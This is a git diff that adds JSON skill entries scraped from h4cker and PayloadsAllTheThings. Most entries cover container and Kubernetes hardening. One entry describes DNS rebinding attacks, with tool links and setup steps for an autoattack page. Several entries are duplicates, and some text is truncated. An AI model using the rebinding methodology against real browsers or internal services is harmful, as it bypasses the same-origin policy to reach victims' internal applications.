+ "- [CSIRT-Collect - PowerShell Script To Collect Memory And (Triage) Disk Forensics](http://feedproxy.google.com/~r/PentestTools/~3/-tNVO3wk2pY/csirt-collect-powershell-script-to.html)",
+ "- [Columbo - A Computer Forensic Analysis Tool Used To Simplify And Identify Specific Patterns In Compromised Datasets](http://feedproxy.google.com/~r/PentestTools/~3/9cMEG4O3F8k/columbo-computer-forensic-analysis-tool.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/dfir/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/dns_rebinding-9b9689410228.json b/skills/dns_rebinding-9b9689410228.json
new file mode 100644
index 0000000..c26c5b5
--- /dev/null
+++ b/skills/dns_rebinding-9b9689410228.json
@@ -0,0 +1,24 @@
+{
+ "id": "dns_rebinding-9b9689410228",
+ "category": "DNS_REBINDING",
+ "title": "README",
+ "description": "# DNS Rebinding\n\n> DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses.\n\n## Summary\n\n* [Tools](#tools)\n* [Methodology](#methodology)\n* [Protection Bypasses](#protection-bypasses)\n * [0.0.0.0](#0000)\n * [CNAME](",
+ "payloads": [
+ "> DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses.",
+ "* [nccgroup/singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework.",
+ "* [rebind.it](http://rebind.it/) - Singularity of Origin Web Client.",
+ "* [taviso/rbndr](https://github.com/taviso/rbndr) - Simple DNS Rebinding Service",
+ "* [taviso/rebinder](https://lock.cmpxchg8b.com/rebinder.html) - rbndr Tool Helper",
+ "2. [Setup Singularity of Origin](https://github.com/nccgroup/singularity/wiki/Setup-and-Installation).",
+ "3. Edit the [autoattack HTML page](https://github.com/nccgroup/singularity/blob/master/html/autoattack.html) for your needs.",
+ "4. Browse to `http://rebinder.your.domain:8080/autoattack.html`.",
+ "In the case where DNS protection are enabled (generally disabled by default), NCC Group has documented multiple [DNS protection bypasses](https://github.com/nccgroup/singularity/wiki/Protection-Bypasses) that can be used.",
+ "; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer",
+ "; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer",
+ "* [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)"
+ ],
+ "references": [
+ "PayloadsAllTheThings/DNS Rebinding/README.md"
+ ],
+ "source": "PayloadsAllTheThings"
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_01bf79334284.json b/skills/docker_and_k8s_security_01bf79334284.json
new file mode 100644
index 0000000..6e7632c
--- /dev/null
+++ b/skills/docker_and_k8s_security_01bf79334284.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_01bf79334284",
+ "category": "docker-and-k8s-security",
+ "title": "EKS best practices",
+ "description": "# Elastic Kubernetes Service (EKS)\nElastic Kubernetes Service (EKS) is a managed Kubernetes service provided by Amazon Web Services (AWS). When it comes to securing an EKS cluster, there are several aspects to consider. Here are some important security considerations for EKS:\n\n1. Cluster Isolation: Ensure that each EKS cluster is isolated from other AWS resources and networks to prevent unauthorized access. Use Virtual Private Cloud (VPC) network isolation and implement security groups and netwo",
+ "payloads": [
+ "# Elastic Kubernetes Service (EKS)",
+ "Elastic Kubernetes Service (EKS) is a managed Kubernetes service provided by Amazon Web Services (AWS). When it comes to securing an EKS cluster, there are several aspects to consider. Here are some important security considerations for EKS:",
+ "1. Cluster Isolation: Ensure that each EKS cluster is isolated from other AWS resources and networks to prevent unauthorized access. Use Virtual Private Cloud (VPC) network isolation and implement security groups and network access control lists (ACLs) to control inbound and outbound traffic.",
+ "2. Authentication and Authorization: Use AWS Identity and Access Management (IAM) to control access to EKS resources. Implement the principle of least privilege, granting only the necessary permissions to users and services. Consider using IAM roles for service accounts (IRSA) to manage access permissions for pods.",
+ "3. Secure API Server: Protect the EKS API server, which is the control plane component of the cluster. Ensure that it is only accessible by authorized users and services. Leverage AWS Network Load Balancer or AWS PrivateLink to securely expose the API server.",
+ "4. Node Security: Apply security best practices to the worker nodes in your EKS cluster. Regularly patch and update the underlying operating system, monitor for vulnerabilities, and follow container security best practices when building and deploying container images.",
+ "5. Network Security: Use AWS VPC networking features, such as security groups and network ACLs, to control network traffic between pods and other AWS resources. Consider using AWS PrivateLink or AWS Direct Connect to establish private network connections between EKS and other resources.",
+ "6. Logging and Monitoring: Enable logging and monitoring for your EKS cluster. Leverage AWS CloudTrail for API auditing, Amazon CloudWatch for cluster and application monitoring, and Amazon GuardDuty for threat detection. Collect and analyze logs to identify potential security issues.",
+ "7. Encryption: Implement encryption at rest and in transit. Use AWS Key Management Service (KMS) to manage encryption keys for your EKS cluster. Encrypt sensitive data stored in persistent volumes and use secure communication channels between components.",
+ "8. Vulnerability Management: Regularly scan your EKS cluster and container images for vulnerabilities. Monitor for security advisories and apply patches and updates promptly. Consider using third-party security tools or services to enhance vulnerability management.",
+ "9. Disaster Recovery and Backup: Implement a robust backup and disaster recovery strategy for your EKS cluster. Regularly back up critical data, configurations, and manifests. Test the recovery process to ensure it is effective.",
+ "10. Security Auditing and Compliance: Perform security audits and assessments on your EKS cluster to identify potential weaknesses. Follow security best practices and adhere to relevant compliance standards and regulations, such as the AWS Well-Architected Framework and industry-specific guidelines.",
+ "Remember that security is a continuous process, and it is important to stay up to date with the latest security practices, patches, and advisories relevant to EKS and its associated components.",
+ "The following table summarizes the EKS security best practices along with reference links for further information:",
+ "| Best Practice | Reference Links |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/EKS-best-practices.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_06f0b2f4d3e3.json b/skills/docker_and_k8s_security_06f0b2f4d3e3.json
new file mode 100644
index 0000000..9225e47
--- /dev/null
+++ b/skills/docker_and_k8s_security_06f0b2f4d3e3.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_06f0b2f4d3e3",
+ "category": "docker-and-k8s-security",
+ "title": "secrets",
+ "description": "# Kubernetes Secrets\nWhile Kubernetes Secrets provide a convenient way to manage sensitive information within a Kubernetes cluster, there are alternative solutions that you can consider based on your specific requirements:\n\n1. **External Secrets Management Systems**:\n - Use external secrets management systems such as HashiCorp Vault or Azure Key Vault.\n - These systems provide enhanced security features, centralized management, and fine-grained access control for secrets.\n - Kubernetes can",
+ "payloads": [
+ "# Kubernetes Secrets",
+ "While Kubernetes Secrets provide a convenient way to manage sensitive information within a Kubernetes cluster, there are alternative solutions that you can consider based on your specific requirements:",
+ "1. **External Secrets Management Systems**:",
+ "- Use external secrets management systems such as HashiCorp Vault or Azure Key Vault.",
+ "- These systems provide enhanced security features, centralized management, and fine-grained access control for secrets.",
+ "- Kubernetes can integrate with these systems through plugins or custom controllers to fetch secrets during runtime.",
+ "2. **Configuration Management Tools**:",
+ "- Leverage configuration management tools like Ansible, Puppet, or Chef to manage and distribute secrets to Kubernetes clusters.",
+ "- These tools offer more advanced features for secret rotation, versioning, and auditing.",
+ "- Secrets can be encrypted and securely stored in the configuration management system, and then retrieved during deployment or runtime.",
+ "3. **Encrypted Environment Variables**:",
+ "- Instead of using Kubernetes Secrets, you can encrypt sensitive information and store them as environment variables within the Pod specification.",
+ "- Encryption can be achieved using tools like SOPS or using built-in encryption capabilities of your deployment automation or configuration management tool.",
+ "4. **External Key Management Services**:",
+ "- Utilize external key management services like AWS Key Management Service (KMS) or Google Cloud Key Management Service (KMS) for managing encryption keys."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/kubernetes/secrets.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_229e48391b58.json b/skills/docker_and_k8s_security_229e48391b58.json
new file mode 100644
index 0000000..dc996be
--- /dev/null
+++ b/skills/docker_and_k8s_security_229e48391b58.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_229e48391b58",
+ "category": "docker-and-k8s-security",
+ "title": "EKS best practices",
+ "description": "# Elastic Kubernetes Service (EKS)\nElastic Kubernetes Service (EKS) is a managed Kubernetes service provided by Amazon Web Services (AWS). When it comes to securing an EKS cluster, there are several aspects to consider. Here are some important security considerations for EKS:\n\n1. Cluster Isolation: Ensure that each EKS cluster is isolated from other AWS resources and networks to prevent unauthorized access. Use Virtual Private Cloud (VPC) network isolation and implement security groups and netwo",
+ "payloads": [
+ "# Elastic Kubernetes Service (EKS)",
+ "Elastic Kubernetes Service (EKS) is a managed Kubernetes service provided by Amazon Web Services (AWS). When it comes to securing an EKS cluster, there are several aspects to consider. Here are some important security considerations for EKS:",
+ "1. Cluster Isolation: Ensure that each EKS cluster is isolated from other AWS resources and networks to prevent unauthorized access. Use Virtual Private Cloud (VPC) network isolation and implement security groups and network access control lists (ACLs) to control inbound and outbound traffic.",
+ "2. Authentication and Authorization: Use AWS Identity and Access Management (IAM) to control access to EKS resources. Implement the principle of least privilege, granting only the necessary permissions to users and services. Consider using IAM roles for service accounts (IRSA) to manage access permissions for pods.",
+ "3. Secure API Server: Protect the EKS API server, which is the control plane component of the cluster. Ensure that it is only accessible by authorized users and services. Leverage AWS Network Load Balancer or AWS PrivateLink to securely expose the API server.",
+ "4. Node Security: Apply security best practices to the worker nodes in your EKS cluster. Regularly patch and update the underlying operating system, monitor for vulnerabilities, and follow container security best practices when building and deploying container images.",
+ "5. Network Security: Use AWS VPC networking features, such as security groups and network ACLs, to control network traffic between pods and other AWS resources. Consider using AWS PrivateLink or AWS Direct Connect to establish private network connections between EKS and other resources.",
+ "6. Logging and Monitoring: Enable logging and monitoring for your EKS cluster. Leverage AWS CloudTrail for API auditing, Amazon CloudWatch for cluster and application monitoring, and Amazon GuardDuty for threat detection. Collect and analyze logs to identify potential security issues.",
+ "7. Encryption: Implement encryption at rest and in transit. Use AWS Key Management Service (KMS) to manage encryption keys for your EKS cluster. Encrypt sensitive data stored in persistent volumes and use secure communication channels between components.",
+ "8. Vulnerability Management: Regularly scan your EKS cluster and container images for vulnerabilities. Monitor for security advisories and apply patches and updates promptly. Consider using third-party security tools or services to enhance vulnerability management.",
+ "9. Disaster Recovery and Backup: Implement a robust backup and disaster recovery strategy for your EKS cluster. Regularly back up critical data, configurations, and manifests. Test the recovery process to ensure it is effective.",
+ "10. Security Auditing and Compliance: Perform security audits and assessments on your EKS cluster to identify potential weaknesses. Follow security best practices and adhere to relevant compliance standards and regulations, such as the AWS Well-Architected Framework and industry-specific guidelines.",
+ "Remember that security is a continuous process, and it is important to stay up to date with the latest security practices, patches, and advisories relevant to EKS and its associated components.",
+ "The following table summarizes the EKS security best practices along with reference links for further information:",
+ "| Best Practice | Reference Links |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/EKS-best-practices.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_31d1c634179a.json b/skills/docker_and_k8s_security_31d1c634179a.json
new file mode 100644
index 0000000..7f6e9a9
--- /dev/null
+++ b/skills/docker_and_k8s_security_31d1c634179a.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_31d1c634179a",
+ "category": "docker-and-k8s-security",
+ "title": "seccomp",
+ "description": "# SECCOMP\nTo use seccomp (Secure Computing Mode) with Docker, you can follow these steps:\n\n1. Enable seccomp in the Docker daemon:\n - Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.\n - Add the following configuration to enable seccomp:\n ```json\n {\n \"seccomp-profiles\": [\n {\n \"name\": \"default\",\n \"path\": \"/path/to/seccomp/profile.json\"\n }\n ]\n }\n ```\n Replace `/path/to/seccomp/profile.j",
+ "payloads": [
+ "# SECCOMP",
+ "To use seccomp (Secure Computing Mode) with Docker, you can follow these steps:",
+ "1. Enable seccomp in the Docker daemon:",
+ "- Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.",
+ "- Add the following configuration to enable seccomp:",
+ "```json",
+ "\"seccomp-profiles\": [",
+ "\"name\": \"default\",",
+ "\"path\": \"/path/to/seccomp/profile.json\"",
+ "Replace `/path/to/seccomp/profile.json` with the actual path to your seccomp profile JSON file.",
+ "- Save the configuration file and restart the Docker daemon to apply the changes.",
+ "2. Create a seccomp profile JSON file:",
+ "- Create a JSON file that defines the seccomp profile for your Docker containers. This file specifies the system calls that are allowed or denied within the container.",
+ "- You can create your own custom seccomp profile or use an existing profile as a starting point. There are various sources available for seccomp profiles, such as the Docker seccomp repository on GitHub, which provides pre-defined profiles for common use cases.",
+ "- Define the desired system calls and their corresponding actions (allow or deny) in the JSON file."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/docker/seccomp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_398af2e037ed.json b/skills/docker_and_k8s_security_398af2e037ed.json
new file mode 100644
index 0000000..8d56ccc
--- /dev/null
+++ b/skills/docker_and_k8s_security_398af2e037ed.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_398af2e037ed",
+ "category": "docker-and-k8s-security",
+ "title": "network policy example",
+ "description": "# Example of a Network Policy in Kubernetes\nIn this example, we have created a network policy named `my-network-policy` that applies to pods with the label `app: my-app`.\n\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: my-network-policy\nspec:\n podSelector:\n matchLabels:\n app: my-app\n policyTypes:\n - Ingress\n - Egress\n ingress:\n - from:\n - podSelector:\n matchLabels:\n role: backend\n - ipBlock:\n cid",
+ "payloads": [
+ "# Example of a Network Policy in Kubernetes",
+ "In this example, we have created a network policy named `my-network-policy` that applies to pods with the label `app: my-app`.",
+ "```yaml",
+ "apiVersion: networking.k8s.io/v1",
+ "kind: NetworkPolicy",
+ "metadata:",
+ "name: my-network-policy",
+ "podSelector:",
+ "matchLabels:",
+ "app: my-app",
+ "policyTypes:",
+ "- Ingress",
+ "- Egress",
+ "ingress:",
+ "- from:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/kubernetes/network-policy-example.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_40a7487552db.json b/skills/docker_and_k8s_security_40a7487552db.json
new file mode 100644
index 0000000..4964106
--- /dev/null
+++ b/skills/docker_and_k8s_security_40a7487552db.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_40a7487552db",
+ "category": "docker-and-k8s-security",
+ "title": "container technology concepts",
+ "description": "# Container Technology Concepts\n\nContainer technologies have become an important part of modern software development, providing a lightweight and portable way to package and deploy applications. Here are some of the prominent container technologies:\n\n### Docker\nDocker is the most widely known and used container platform. It simplifies the creation, deployment, and running of applications by using containers. Docker packages software into standardized units for development, shipment, and deployme",
+ "payloads": [
+ "# Container Technology Concepts",
+ "Container technologies have become an important part of modern software development, providing a lightweight and portable way to package and deploy applications. Here are some of the prominent container technologies:",
+ "### Docker",
+ "Docker is the most widely known and used container platform. It simplifies the creation, deployment, and running of applications by using containers. Docker packages software into standardized units for development, shipment, and deployment, making it easier to manage and scale applications across different environments[2][3].",
+ "### LXC (Linux Containers)",
+ "LXC is an open-source project that provides isolated application environments similar to virtual machines but without the overhead of running their own kernel. LXC allows multiple processes to run within a container and is managed without a central daemon, differing from Docker's single-process-per-container approach[2][3].",
+ "### CRI-O",
+ "CRI-O is an implementation of the Kubernetes Container Runtime Interface (CRI) to enable using Open Container Initiative (OCI) compatible runtimes. It aims to replace Docker as the container engine for Kubernetes, allowing Kubernetes to use any OCI-compliant runtime for running pods[2][3].",
+ "### rkt (Rocket)",
+ "rkt is an application container engine designed for building modern cloud-native applications. It focuses on security improvements and is often used in conjunction with other technologies or as specific components of a Docker-based system[2][3].",
+ "### Podman",
+ "Podman is an open-source container engine that allows users to manage containers without requiring a daemon. It is compatible with Docker and can run containers as rootless, enhancing security by not requiring root privileges[1].",
+ "### containerd",
+ "containerd is an industry-standard core container runtime that manages the complete container lifecycle of its host system, from image transfer and storage to container execution and supervision. It is used by Docker and Kubernetes as their container runtime[2].",
+ "### Buildah"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/docker/container_technology_concepts.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_43ab1f1c82d8.json b/skills/docker_and_k8s_security_43ab1f1c82d8.json
new file mode 100644
index 0000000..efa49cc
--- /dev/null
+++ b/skills/docker_and_k8s_security_43ab1f1c82d8.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_43ab1f1c82d8",
+ "category": "docker-and-k8s-security",
+ "title": "network policy example",
+ "description": "# Example of a Network Policy in Kubernetes\nIn this example, we have created a network policy named `my-network-policy` that applies to pods with the label `app: my-app`.\n\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: my-network-policy\nspec:\n podSelector:\n matchLabels:\n app: my-app\n policyTypes:\n - Ingress\n - Egress\n ingress:\n - from:\n - podSelector:\n matchLabels:\n role: backend\n - ipBlock:\n cid",
+ "payloads": [
+ "# Example of a Network Policy in Kubernetes",
+ "In this example, we have created a network policy named `my-network-policy` that applies to pods with the label `app: my-app`.",
+ "```yaml",
+ "apiVersion: networking.k8s.io/v1",
+ "kind: NetworkPolicy",
+ "metadata:",
+ "name: my-network-policy",
+ "podSelector:",
+ "matchLabels:",
+ "app: my-app",
+ "policyTypes:",
+ "- Ingress",
+ "- Egress",
+ "ingress:",
+ "- from:"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/kubernetes/network-policy-example.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_4a914c0c86df.json b/skills/docker_and_k8s_security_4a914c0c86df.json
new file mode 100644
index 0000000..8beb686
--- /dev/null
+++ b/skills/docker_and_k8s_security_4a914c0c86df.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_4a914c0c86df",
+ "category": "docker-and-k8s-security",
+ "title": "GKE",
+ "description": "# Google Kubernetes Engine (GKE)\nThe following are security best practices for Google Kubernetes Engine (GKE) along with reference links for further information:\n\n| Best Practice | Reference Links |\n|---------",
+ "payloads": [
+ "# Google Kubernetes Engine (GKE)",
+ "The following are security best practices for Google Kubernetes Engine (GKE) along with reference links for further information:",
+ "| Best Practice | Reference Links |",
+ "|-----------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|",
+ "| Implement cluster isolation | [GKE Documentation - Isolating Clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-organization) |",
+ "| Use IAM for authentication and authorization | [GKE Documentation - Identity and Access Management](https://cloud.google.com/kubernetes-engine/docs/how-to/iam-integration) |",
+ "| Secure the GKE API server | [GKE Documentation - Securing the Kubernetes API Server](https://cloud.google.com/kubernetes-engine/docs/how-to/api-server-security) |",
+ "| Apply security best practices to worker nodes | [GKE Documentation - Hardening Your Cluster's Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster-nodes) |",
+ "| Implement network security | [GKE Documentation - Network Security](https://cloud.google.com/kubernetes-engine/docs/how-to/network-policy) |",
+ "| Enable logging and monitoring | [GKE Documentation - Logging and Monitoring](https://cloud.google.com/kubernetes-engine/docs/how-to/logging) |",
+ "| Implement encryption at rest and in transit | [GKE Documentation - Encryption at Rest](https://cloud.google.com/kubernetes-engine/docs/how-to/encrypting-secrets) |",
+ "| Implement vulnerability management | [GKE Documentation - Security Best Practices](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-security) |",
+ "| Establish disaster recovery and backup strategies | [GKE Documentation - Backup and Restore](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-backup) |",
+ "| Perform security auditing and compliance assessments | [GKE Documentation - Security Overview](https://cloud.google.com/kubernetes-engine/docs/concepts/security-overview) |",
+ "These reference links will provide you with detailed information and guidelines for implementing each best practice in securing your GKE cluster."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/GKE.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_5b9196ebef51.json b/skills/docker_and_k8s_security_5b9196ebef51.json
new file mode 100644
index 0000000..3b5bdb7
--- /dev/null
+++ b/skills/docker_and_k8s_security_5b9196ebef51.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_5b9196ebef51",
+ "category": "docker-and-k8s-security",
+ "title": "additional tools",
+ "description": "# Additional Docker Security Tools and Resources\n\n- [Anchor Engine](https://github.com/anchore/anchore) - Analyze images for CVE vulnerabilities and against custom security policies by [@Anchor](https://github.com/anchore)\n- [Aqua Security](https://www.aquasec.com) :heavy_dollar_sign: - Securing container-based applications from Dev to Production on any platform\n- [bane](https://github.com/genuinetools/bane) - AppArmor profile generator for Docker containers by [@genuinetools][genuinetools]\n- [C",
+ "payloads": [
+ "# Additional Docker Security Tools and Resources",
+ "- [Anchor Engine](https://github.com/anchore/anchore) - Analyze images for CVE vulnerabilities and against custom security policies by [@Anchor](https://github.com/anchore)",
+ "- [Aqua Security](https://www.aquasec.com) :heavy_dollar_sign: - Securing container-based applications from Dev to Production on any platform",
+ "- [bane](https://github.com/genuinetools/bane) - AppArmor profile generator for Docker containers by [@genuinetools][genuinetools]",
+ "- [CIS Docker Benchmark](https://github.com/dev-sec/cis-docker-benchmark) - This [InSpec][inspec] compliance profile implement the CIS Docker 1.12.0 Benchmark in an automated way to provide security best-practice tests around Docker daemon and containers in a production environment. By [@dev-sec](https://github.com/dev-sec)",
+ "- [Clair](https://github.com/quay/clair) - Clair is an open source project for the static analysis of vulnerabilities in appc and docker containers. By [@coreos][coreos]",
+ "- [Dagda](https://github.com/eliasgranderubio/dagda) - Dagda is a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities. By [@eliasgranderubio](https://github.com/eliasgranderubio)",
+ "- [Deepfence SecretScanner](https://github.com/deepfence/SecretScanner) - Find unprotected secrets - tokens, keys, passwords - in containers and host filesystems.",
+ "- [Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper) - Powerful open source runtime vulnerability scanner for kubernetes, virtual machines and serverless.",
+ "- [Deepfence ThreatStryker](https://deepfence.io/threatstryker/) :heavy_dollar_sign: - Full life cycle Cloud Native Workload Protection platform for kubernetes, virtual machines and serverless. By [@deepfence](deepfence)",
+ "- [docker-bench-security](https://github.com/docker/docker-bench-security) - script that checks for dozens of common best-practices around deploying Docker containers in production.",
+ "- [docker-explorer](https://github.com/google/docker-explorer) - A tool to help forensicate offline docker acquisitions by Google",
+ "- [docker-lock](https://github.com/safe-waters/docker-lock) - A cli-plugin for docker to automatically manage image digests by tracking them in a separate Lockfile. By [@safe-waters][safe-waters]",
+ "- [notary](https://github.com/theupdateframework/notary) - a server and a client for running and interacting with trusted collections.",
+ "- [oscap-docker](https://github.com/OpenSCAP/openscap) - OpenSCAP provides oscap-docker tool which is used to scan Docker containers and images. By [OpenSCAP](https://github.com/OpenSCAP)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/docker/additional-tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_6bac976b1d35.json b/skills/docker_and_k8s_security_6bac976b1d35.json
new file mode 100644
index 0000000..f030964
--- /dev/null
+++ b/skills/docker_and_k8s_security_6bac976b1d35.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_6bac976b1d35",
+ "category": "docker-and-k8s-security",
+ "title": "audit docker",
+ "description": "# Audit Rules in Docker\nIn Docker, audit rules are used to monitor and log various activities within the Docker environment. They provide a way to track and record important events related to containers, images, networks, and other Docker components. By setting up audit rules, you can gain visibility into the actions and operations performed within the Docker ecosystem.\n\nAudit rules are typically configured using the Docker daemon's audit log feature, which utilizes the Linux audit framework. Th",
+ "payloads": [
+ "# Audit Rules in Docker",
+ "In Docker, audit rules are used to monitor and log various activities within the Docker environment. They provide a way to track and record important events related to containers, images, networks, and other Docker components. By setting up audit rules, you can gain visibility into the actions and operations performed within the Docker ecosystem.",
+ "Audit rules are typically configured using the Docker daemon's audit log feature, which utilizes the Linux audit framework. The audit framework allows you to define specific conditions or events to be monitored and logged.",
+ "Here are some common use cases and benefits of using audit rules in Docker:",
+ "1. Security Monitoring: Audit rules help in detecting and investigating potential security breaches or suspicious activities within the Docker environment. By monitoring specific events such as container creations, image pulls, network connections, or file access, you can identify unauthorized or malicious activities.",
+ "2. Compliance and Governance: Audit rules assist in meeting compliance requirements and maintaining proper governance. They help demonstrate that security policies, access controls, and operational procedures are being followed. Audit logs can be useful for audits, incident response, and forensic investigations.",
+ "3. Troubleshooting and Diagnostics: Audit logs provide valuable insights when troubleshooting issues within the Docker environment. By capturing events related to container start/stop, network connectivity, or resource usage, you can identify problematic areas and diagnose the root cause of problems.",
+ "4. Operational Insights: Audit rules offer visibility into various operational aspects of Docker, such as user actions, changes to configurations, or resource allocations. This information can be leveraged for capacity planning, resource optimization, and overall operational improvements.",
+ "When setting up audit rules in Docker, you can define specific events to be logged based on criteria such as user identities, object types (containers, images), operations (create, start, stop), and other attributes. The rules can be configured using the `audit.json` file, which specifies the events and conditions to monitor.",
+ "Make sure to have a balance between the level of detail in audit logging and the impact on system performance and log storage. You should carefully select the events to monitor based on your specific needs and operational requirements.",
+ "## Example",
+ "1. Enable Audit Logging:",
+ "- Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.",
+ "- Add the following configuration to enable audit logging:",
+ "```json"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/docker/audit-docker.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_6bf21d26c6c4.json b/skills/docker_and_k8s_security_6bf21d26c6c4.json
new file mode 100644
index 0000000..0c7ac21
--- /dev/null
+++ b/skills/docker_and_k8s_security_6bf21d26c6c4.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_6bf21d26c6c4",
+ "category": "docker-and-k8s-security",
+ "title": "podman vs docker",
+ "description": "# Podman vs Docker\n\n- Docker uses a daemon, an ongoing program running in the background, to create images and run containers.\n- Podman has a daemon-less architecture\u00a0which means it can run containers under the user starting the container. \n- Docker has a client-server logic mediated by a daemon; Podman does not need the mediator.\n- Podman allows for non-root privileges for containers.\n- Rootless containers are considered safer than containers with root privileges\n\n## Podman Rootless?\n\n- Contain",
+ "payloads": [
+ "# Podman vs Docker",
+ "- Docker uses a daemon, an ongoing program running in the background, to create images and run containers.",
+ "- Podman has a daemon-less architecture\u00a0which means it can run containers under the user starting the container.",
+ "- Docker has a client-server logic mediated by a daemon; Podman does not need the mediator.",
+ "- Podman allows for non-root privileges for containers.",
+ "- Rootless containers are considered safer than containers with root privileges",
+ "## Podman Rootless?",
+ "- Containers in Podman do not have root access by default, adding a natural barrier between root and rootless levels, improving security.",
+ "- Still, Podman can run both root and rootless containers.",
+ "## What about Systemd?",
+ "- Without a daemon, Podman needs another tool to manage services and support running containers in the background.",
+ "- Systemd creates control units for existing containers or to generate new ones.",
+ "- Systemd can also be integrated with Podman allowing it to run containers with systemd enabled by default, without any modification.",
+ "- By using systemd, vendors can install, run, and manage their applications as containers since most are now exclusively packaged and delivered this way.",
+ "## Building images"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/podman_vs_docker.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_7a772524a661.json b/skills/docker_and_k8s_security_7a772524a661.json
new file mode 100644
index 0000000..cdf32bd
--- /dev/null
+++ b/skills/docker_and_k8s_security_7a772524a661.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_7a772524a661",
+ "category": "docker-and-k8s-security",
+ "title": "docker swarm firewalls",
+ "description": "# Docker Swarm and Linux Firewall Implementations\n\nBy default, Docker Swarm uses an overlay network that encapsulates network traffic, making it difficult for firewall rules to filter or control the traffic. To handle this problem and enforce firewall rules effectively in a Docker Swarm environment, you can follow these steps:\n\n1. **Disable Docker's built-in firewall management**: Docker includes its own firewall management, which can conflict with external firewalls like firewalld. Disable Dock",
+ "payloads": [
+ "# Docker Swarm and Linux Firewall Implementations",
+ "By default, Docker Swarm uses an overlay network that encapsulates network traffic, making it difficult for firewall rules to filter or control the traffic. To handle this problem and enforce firewall rules effectively in a Docker Swarm environment, you can follow these steps:",
